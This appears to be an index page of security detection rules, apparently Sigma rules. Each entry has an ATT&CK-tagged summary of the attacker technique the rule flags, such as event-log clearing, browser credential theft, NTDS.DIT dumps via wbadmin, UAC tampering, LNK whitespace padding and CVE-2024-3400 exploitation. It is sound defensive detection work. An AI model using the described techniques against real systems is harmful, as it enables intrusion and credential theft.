  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4

    calendar Apr 17, 2025 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.


    Read More
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE

    calendar Apr 17, 2025 · attack.defense-evasion attack.lateral-movement attack.t1021.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values


    Read More
  • Scheduled Task Executing Encoded Payload from Registry

    calendar Apr 17, 2025 · attack.execution attack.persistence attack.t1053.005 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.


    Read More
  • Suspicious Eventlog Clear

    calendar Apr 16, 2025 · attack.defense-evasion attack.t1070.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs


    Read More
  • Suspicious Eventlog Clearing or Configuration Change Activity

    calendar Apr 16, 2025 · attack.defense-evasion attack.t1070.001 attack.t1562.002 car.2016-04-002  ·
    Share on: twitter facebook linkedin copy

    Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique were seen used by threat actors and ransomware strains in order to evade defenses.


    Read More
  • Potential Product Class Reconnaissance Via Wmic.EXE

    calendar Apr 16, 2025 · attack.execution attack.t1047 attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products. Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.


    Read More
  • Potential Browser Data Stealing

    calendar Apr 16, 2025 · attack.credential-access attack.t1555.003  ·
    Share on: twitter facebook linkedin copy

    Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.


    Read More
  • Suspicious LNK Command-Line Padding with Whitespace Characters

    calendar Apr 16, 2025 · attack.initial-access attack.execution attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D). Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. This rule flags suspicious use of such padding observed in real-world attacks.


    Read More
  • DarkGate - Drop DarkGate Loader In C:\Temp Directory

    calendar Apr 16, 2025 · attack.execution attack.t1059 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.


    Read More
  • File Download Via Nscurl - MacOS

    calendar Apr 16, 2025 · attack.defense-evasion attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the nscurl utility in order to download files.


    Read More
  • File Recovery From Backup Via Wbadmin.EXE

    calendar Apr 16, 2025 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.


    Read More
  • Launch Agent/Daemon Execution Via Launchctl

    calendar Apr 16, 2025 · attack.execution attack.persistence attack.t1569.001 attack.t1543.001 attack.t1543.004  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.


    Read More
  • LSASS Process Reconnaissance Via Findstr.EXE

    calendar Apr 16, 2025 · attack.credential-access attack.t1552.006  ·
    Share on: twitter facebook linkedin copy

    Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID


    Read More
  • Network Communication Initiated To Portmap.IO Domain

    calendar Apr 16, 2025 · attack.t1041 attack.command-and-control attack.t1090.002 attack.exfiltration  ·
    Share on: twitter facebook linkedin copy

    Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors


    Read More
  • Network Connection Initiated To Cloudflared Tunnels Domains

    calendar Apr 16, 2025 · attack.exfiltration attack.command-and-control attack.t1567.001  ·
    Share on: twitter facebook linkedin copy

    Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.


    Read More
  • New File Exclusion Added To Time Machine Via Tmutil - MacOS

    calendar Apr 16, 2025 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.


    Read More
  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application

    calendar Apr 16, 2025 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.


    Read More
  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE

    calendar Apr 16, 2025 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".


    Read More
  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock

    calendar Apr 16, 2025 · attack.credential-access attack.discovery attack.t1040  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of powershell scripts with calls to the "Start-NetEventSession" cmdlet. Which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.


    Read More
  • Potential Suspicious Browser Launch From Document Reader Process

    calendar Apr 16, 2025 · attack.execution attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.


    Read More
  • Potentially Suspicious Malware Callback Communication - Linux

    calendar Apr 16, 2025 · attack.persistence attack.command-and-control attack.t1571  ·
    Share on: twitter facebook linkedin copy

    Detects programs that connect to known malware callback ports based on threat intelligence reports.


    Read More
  • Potentially Suspicious Usage Of Qemu

    calendar Apr 16, 2025 · attack.command-and-control attack.t1090 attack.t1572  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.


    Read More
  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location

    calendar Apr 16, 2025 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.


    Read More
  • Sensitive File Dump Via Wbadmin.EXE

    calendar Apr 16, 2025 · attack.credential-access attack.t1003.003  ·
    Share on: twitter facebook linkedin copy

    Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.


    Read More
  • Sensitive File Recovery From Backup Via Wbadmin.EXE

    calendar Apr 16, 2025 · attack.credential-access attack.t1003.003  ·
    Share on: twitter facebook linkedin copy

    Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.


    Read More
  • Suspicious External WebDAV Execution

    calendar Apr 16, 2025 · attack.initial-access attack.t1584 attack.t1566  ·
    Share on: twitter facebook linkedin copy

    Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.


    Read More
  • System Information Discovery Via Sysctl - MacOS

    calendar Apr 16, 2025 · attack.defense-evasion attack.t1497.001 attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.


    Read More
  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS

    calendar Apr 16, 2025 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.


    Read More
  • Time Machine Backup Disabled Via Tmutil - MacOS

    calendar Apr 16, 2025 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring.


    Read More
  • UAC Notification Disabled

    calendar Apr 16, 2025 · attack.privilege-escalation attack.defense-evasion attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.


    Read More
  • UAC Secure Desktop Prompt Disabled

    calendar Apr 16, 2025 · attack.privilege-escalation attack.defense-evasion attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.


    Read More
  • Uncommon File Creation By Mysql Daemon Process

    calendar Apr 16, 2025 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware.


    Read More
  • Uncommon Process Access Rights For Target Image

    calendar Apr 16, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1055.011  ·
    Share on: twitter facebook linkedin copy

    Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.


    Read More
  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted

    calendar Apr 16, 2025 · attack.collection attack.t1113  ·
    Share on: twitter facebook linkedin copy

    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.


    Read More
  • Windows Recall Feature Enabled - Registry

    calendar Apr 16, 2025 · attack.collection attack.t1113  ·
    Share on: twitter facebook linkedin copy

    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.


    Read More
  • Windows Recall Feature Enabled Via Reg.EXE

    calendar Apr 16, 2025 · attack.collection attack.t1113  ·
    Share on: twitter facebook linkedin copy

    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.


    Read More
  • Potential Adplus.EXE Abuse

    calendar Apr 16, 2025 · attack.defense-evasion attack.execution attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.


    Read More
  • Potential Binary Impersonating Sysinternals Tools

    calendar Apr 16, 2025 · attack.execution attack.defense-evasion attack.t1218 attack.t1202 attack.t1036.005  ·
    Share on: twitter facebook linkedin copy

    Detects binaries that use the same name as legitimate sysinternals tools to evade detection. This rule looks for the execution of binaries that are named similarly to Sysinternals tools. Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.


    Read More
  • Potential CVE-2023-23397 Exploitation Attempt - SMB

    calendar Apr 10, 2025 · attack.exfiltration cve.2023-23397 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.


    Read More
  • Buffer Overflow Attempts

    calendar Apr 7, 2025 · attack.t1068 attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects buffer overflow attempts in Unix system log files


    Read More
  • AWS New Lambda Layer Attached

    calendar Apr 7, 2025 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects when a user attached a Lambda layer to an existing Lambda function. A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role. This would give an adversary access to resources that the function has access to.


    Read More
  • Conhost Spawned By Uncommon Parent Process

    calendar Apr 7, 2025 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.


    Read More
  • Elevated System Shell Spawned From Uncommon Parent Location

    calendar Apr 7, 2025 · attack.privilege-escalation attack.defense-evasion attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.


    Read More
  • Potential Binary Or Script Dropper Via PowerShell

    calendar Apr 7, 2025 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects PowerShell creating a binary executable or a script file.


    Read More
  • Potential WinAPI Calls Via CommandLine

    calendar Apr 7, 2025 · attack.execution attack.t1106  ·
    Share on: twitter facebook linkedin copy

    Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec


    Read More
  • Python Initiated Connection

    calendar Apr 7, 2025 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.


    Read More
  • Whoami.EXE Execution Anomaly

    calendar Apr 7, 2025 · attack.discovery attack.t1033 car.2016-03-001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of whoami.exe with suspicious parent processes.


    Read More
  • Windows Processes Suspicious Parent Directory

    calendar Apr 7, 2025 · attack.defense-evasion attack.t1036.003 attack.t1036.005  ·
    Share on: twitter facebook linkedin copy

    Detect suspicious parent processes of well-known Windows processes


    Read More
  • Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock

    calendar Apr 7, 2025 · attack.reconnaissance attack.discovery attack.credential-access attack.t1018 attack.t1558 attack.t1589.002  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the "Get-ADComputer" cmdlet in order to identify systems which are configured for unconstrained delegation.


    Read More
  • Operator Bloopers Cobalt Strike Commands

    calendar Mar 18, 2025 · attack.execution attack.t1059.003 stp.1u  ·
    Share on: twitter facebook linkedin copy

    Detects use of Cobalt Strike commands accidentally entered in the CMD shell


    Read More
  • AnyDesk Network

    calendar Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects use of AnyDesk


    Read More
  • Bumblebee WmiPrvSE execution pattern

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects Bumblebee WmiPrvSE parent process manipulation


    Read More
  • Conhost Suspicious Command Execution

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1564.003 dist.public  ·
    Share on: twitter facebook linkedin copy

    Detects use of conhost in "headless" mode. By running conhost.exe in "headless" mode, it means that no visible window will pop up on the victim's machine.


    Read More
  • Custom Cobalt Strike Command Execution

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1562.001 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a specific OneLiner to Invoke PowerShell commands.


    Read More
  • Deleting Windows Defender scheduled tasks

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of scheduled tasks related to Windows Defender.


    Read More
  • Enable WDigest using PowerShell

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Rule to detect registry modifications to enable WDigest using powershell over the commandline.


    Read More
  • Enable WDigest using PowerShell (ps_module)

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Rule to detect registry modifications to enable WDigest using powershell script modules.


    Read More
  • Enabling RDP service via reg.exe command execution

    calendar Mar 18, 2025 · attack.defense-evasion attack.lateral-movement attack.t1021.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host


    Read More
  • Enabling restricted admin mode

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the registry modification to enable restricted admin mode using reg.exe


    Read More
  • Exchange WebShell Creation

    calendar Mar 18, 2025 · attack.t1505.003 attack.persistence attack.t1190 attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    These commands were used to create a WebShell by exploiting ProxyShell vulnerabilities


    Read More
  • Execution of ZeroLogon PoC executable

    calendar Mar 18, 2025 · attack.execution attack.lateral-movement attack.t1210  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the commonly used ZeroLogon PoC executable.


    Read More
  • FlawedGrace spawning threat injection target

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1055 dist.public  ·
    Share on: twitter facebook linkedin copy

    Detecting the command FlawedGrace is using for the purpose of injecting into it the spawned process, in this case the cmd.exe process.


    Read More
  • Hiding local user accounts

    calendar Mar 18, 2025 · attack.t1564.002 attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the use reg.exe to hide users from listed in the logon screen. This is possible by changing the registry key value to 0 for a specific user.


    Read More
  • Invoke-ShareFinder Module Load Detection

    calendar Mar 18, 2025 · attack.discovery attack.t1135 dist.public  ·
    Share on: twitter facebook linkedin copy

    Use of Invoke-ShareFinder detected via PowerShell logging


    Read More
  • Invoke-ShareFinder Script Block Execution

    calendar Mar 18, 2025 · attack.discovery attack.t1135 dist.public  ·
    Share on: twitter facebook linkedin copy

    Use of Invoke-ShareFinder detected via PowerShell Script Block logging


    Read More
  • JavaScript Execution Using MSDOS 8.3 File Notation

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1059 dist.public  ·
    Share on: twitter facebook linkedin copy

    Detects script execution using MSDOS 8.3 File names


    Read More
  • Lazagne dumping credentials

    calendar Mar 18, 2025 · attack.credential-access attack.t1555  ·
    Share on: twitter facebook linkedin copy

    Detects the use of lazagne using command line execution.


    Read More
  • Mimikatz Command Line With Ticket Export

    calendar Mar 18, 2025 · attack.credential-access attack.t1003 attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006  ·
    Share on: twitter facebook linkedin copy

    Detection of well-known mimikatz command line arguments. Added more commandline indicators from referenced rule by author - Teymur Kheirkhabarov, oscd.community


    Read More
  • Mshta Executing from Registry

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1218.005  ·
    Share on: twitter facebook linkedin copy

    Detects a Mshta executing code from the registry


    Read More
  • Operator Bring Your Own Tools

    calendar Mar 18, 2025 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects use of custom scripts i.e. BAT files.


    Read More
  • Potential Qbot SMB DLL Lateral Movement

    calendar Mar 18, 2025 · attack.lateral-movement attack.t1570  ·
    Share on: twitter facebook linkedin copy

    Detection of potential us of SMB to transfer DLL's into the C$ folder of hosts unique to Qbot malware for purposes of lateral movement.


    Read More
  • Potential SMB DLL Lateral Movement

    calendar Mar 18, 2025 · attack.lateral-movement attack.t1570  ·
    Share on: twitter facebook linkedin copy

    Detection of potential us of SMB to transfer DLL's into the ProgramData folder of hosts for purposes of lateral movement.


    Read More
  • QBot process creation from scheduled task REGSVR32 (regsvr32.exe), -s flag and SYSTEM in the command line

    calendar Mar 18, 2025 · attack.persistence attack.privilege-escalation attack.t1053.005  ·
    Share on: twitter facebook linkedin copy

    Detects the process creation from Scheduled Task with REGSVR32 (regsvr32.exe), -s flag and SYSTEM in the command line


    Read More
  • QBot scheduled task REGSVR32 with C$ image path

    calendar Mar 18, 2025 · attack.persistence attack.privilege-escalation attack.t1053.005  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of Scheduled Task with REGSVR32 (regsvr32.exe) and C$ in the image path field


    Read More
  • Renamed Autohotkey Binary

    calendar Mar 18, 2025 · attack.defense-evasion attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.


    Read More
  • SplashTop Network

    calendar Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects use of SplashTop


    Read More
  • SplashTop Process

    calendar Mar 18, 2025 · attack.lateral-movement attack.t1133 attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects use of SplashTop


    Read More
  • SSH over port 443 with known Server and Client Strings

    calendar Mar 18, 2025 · attack.command-and-control attack.t1572  ·
    Share on: twitter facebook linkedin copy

    Will detect the presence of known SSH client and SSH server strings that have been used for SSH tunneling.


    Read More
  • Suspicious Commands by SQL Server

    calendar Mar 18, 2025 · attack.initial-access attack.persistence attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious commands created from sqlservr process.


    Read More
  • Viewing remote directories

    calendar Mar 18, 2025 · attack.discovery attack.t1083 dist.public  ·
    Share on: twitter facebook linkedin copy

    Detecting the use of dir command to inspect directories on the remote host.


    Read More
  • Potential APT FIN7 Exploitation Activity

    calendar Mar 16, 2025 · attack.execution attack.t1059.001 attack.t1059.003 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.


    Read More
  • Service Reload or Start - Linux

    calendar Mar 4, 2025 · attack.persistence attack.t1543.002  ·
    Share on: twitter facebook linkedin copy

    Detects the start, reload or restart of a service.


    Read More
  • Notepad Password Files Discovery

    calendar Mar 4, 2025 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.


    Read More
  • ADS Zone.Identifier Deleted By Uncommon Application

    calendar Mar 4, 2025 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.


    Read More
  • Cisco Duo Successful MFA Authentication Via Bypass Code

    calendar Mar 4, 2025 · attack.credential-access attack.defense-evasion attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.


    Read More
  • Forest Blizzard APT - Custom Protocol Handler Creation

    calendar Mar 4, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT.


    Read More
  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set

    calendar Mar 4, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT.


    Read More
  • Forest Blizzard APT - JavaScript Constrained File Creation

    calendar Mar 4, 2025 · attack.defense-evasion attack.t1562.002 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.


    Read More
  • Kubernetes Unauthorized or Unauthenticated Access

    calendar Mar 4, 2025 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained.


    Read More
  • Outbound Network Connection Initiated By Microsoft Dialer

    calendar Mar 4, 2025 · attack.execution attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"


    Read More
  • Pnscan Binary Data Transmission Activity

    calendar Mar 4, 2025 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT


    Read More
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection

    calendar Mar 4, 2025 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion cve.2024-3400 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.


    Read More
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation

    calendar Mar 4, 2025 · attack.execution cve.2024-3400 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.


    Read More
  • PUA - SoftPerfect Netscan Execution

    calendar Mar 4, 2025 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.


    Read More
  • RegAsm.EXE Initiating Network Connection To Public IP

    calendar Mar 4, 2025 · attack.defense-evasion attack.t1218.009  ·
    Share on: twitter facebook linkedin copy

    Detects "RegAsm.exe" initiating a network connection to public IP adresses


    Read More
  • Malicious PowerShell Commandlets - PoshModule

    calendar Mar 4, 2025 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Commandlet names from well-known PowerShell exploitation frameworks


    Read More
  • Malicious PowerShell Commandlets - ProcessCreation

    calendar Mar 4, 2025 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Commandlet names from well-known PowerShell exploitation frameworks


    Read More
  • Malicious PowerShell Scripts - FileCreation

    calendar Mar 4, 2025 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of known offensive powershell scripts used for exploitation


    Read More
  • Malicious PowerShell Scripts - PoshModule

    calendar Mar 4, 2025 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance


    Read More
  • Anydesk Remote Access Software Service Installation

    calendar Mar 4, 2025 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.


    Read More
  • Remote Access Tool - AnyDesk Execution

    calendar Mar 4, 2025 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)


    Read More
  • Remote Access Tool - Anydesk Execution From Suspicious Folder

    calendar Mar 4, 2025 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)


    Read More
  • Remote Access Tool - AnyDesk Incoming Connection

